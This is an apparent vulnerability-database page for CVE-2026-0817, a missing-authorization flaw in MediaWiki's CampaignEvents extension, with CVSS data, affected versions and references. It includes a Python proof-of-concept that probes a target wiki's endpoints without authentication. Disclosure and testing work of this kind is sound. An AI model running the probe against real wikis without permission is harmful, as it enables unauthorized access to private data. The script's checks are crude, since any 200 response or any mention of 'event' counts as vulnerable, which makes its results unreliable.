Security Vulnerability Report
CVE-2026-0817 CVSS 5.3 MEDIUM

CVE-2026-0817

Published: 2026-01-09 16:16:08
Last Modified: 2026-02-10 20:20:52
Source: c4f26cc8-17ff-4c99-b5e2-38fc1793eacc

Description

Missing Authorization vulnerability in Wikimedia Foundation MediaWiki - CampaignEvents extension allows Privilege Abuse. This issue affects MediaWiki - CampaignEvents extension: 1.45, 1.44, 1.43, 1.39.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wikimedia:campaignevents:1.39:*:*:*:*:mediawiki:*:* - VULNERABLE
cpe:2.3:a:wikimedia:campaignevents:1.43:*:*:*:*:mediawiki:*:* - VULNERABLE
cpe:2.3:a:wikimedia:campaignevents:1.44:*:*:*:*:mediawiki:*:* - VULNERABLE
cpe:2.3:a:wikimedia:campaignevents:1.45:*:*:*:*:mediawiki:*:* - VULNERABLE
MediaWiki CampaignEvents extension < 1.39
MediaWiki 1.39
MediaWiki 1.43
MediaWiki 1.44
MediaWiki 1.45

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-0817 PoC - MediaWiki CampaignEvents Missing Authorization
# Affected versions: MediaWiki 1.39, 1.43, 1.44, 1.45
import requests
import sys

def exploit_cve_2026_0817(target_url):
    """
    PoC for Missing Authorization in MediaWiki CampaignEvents extension
    This demonstrates accessing privileged endpoints without authentication
    """
    # Target endpoints that should require authorization
    endpoints = [
        "/wiki/Special:CampaignEvents",
        "/w/api.php?action=campaignevents",
        "/w/api.php?action=query&list=campaignevents"
    ]

    print(f"[*] Testing CVE-2026-0817 on {target_url}")

    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint

        # Request without authentication
        headers = {
            'User-Agent': 'Mozilla/5.0 (PoC-Explorer)',
            'Content-Type': 'application/json'
        }

        try:
            response = requests.get(url, headers=headers, timeout=10)

            # Check if we can access privileged information
            if response.status_code == 200:
                print(f"[+] VULNERABLE: {endpoint}")
                print(f" Status: {response.status_code}")
                print(f" Response length: {len(response.text)} bytes")

                # Check for sensitive data exposure
                if 'event' in response.text.lower() or 'campaign' in response.text.lower():
                    print(f" [!] Sensitive campaign data potentially exposed")
            else:
                print(f"[-] Protected: {endpoint} (Status: {response.status_code})")

        except requests.RequestException as e:
            print(f"[!] Error testing {endpoint}: {e}")

    print("\n[*] PoC execution completed")
    print("[*] Note: Successful exploitation requires accessible endpoints")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-0817-poc.py <target_url>")
        print("Example: python cve-2026-0817-poc.py http://wiki.example.com")
        sys.exit(1)

    target = sys.argv[1]
    exploit_cve_2026_0817(target)

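References

https://gerrit.wikimedia.org/r/q/I7ed0049691258c8bd2555e599b9b88490fbe3358 - Patch
https://phabricator.wikimedia.org/T410560 - Issue Tracking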

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0817", "sourceIdentifier": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "published": "2026-01-09T16:16:08.030", "lastModified": "2026-02-10T20:20:51.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Wikimedia Foundation MediaWiki - CampaignEvents extension allows Privilege Abuse.This issue affects MediaWiki - CampaignEvents extension: 1.45, 1.44, 1.43, 1.39."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en la extensión CampaignEvents de Wikimedia Foundation MediaWiki permite el abuso de privilegios. Este problema afecta a la extensión CampaignEvents de MediaWiki: 1.45, 1.44, 1.43, 1.39."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wikimedia:campaignevents:1.39:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "0B6BEF5F-A467-4230-A440-87D592FD7744"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wikimedia:campaignevents:1.43:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "2537B774-AB5F-478B-83B3-692B54EEC11F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wikimedia:campaignevents:1.44:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "1B99FC40-65D2-4940-AEF2-7FC9C8E5706D"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:wikimedia:campaignevents:1.45:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "6EBE5683-3C99-4FF6-BA80-F016F23B1CED"}]}]}], "references": [{"url": "https://gerrit.wikimedia.org/r/q/I7ed0049691258c8bd2555e599b9b88490fbe3358", "source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "tags": ["Patch"]}, {"url": "https://phabricator.wikimedia.org/T410560", "source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "tags": ["Issue Tracking"]}]}}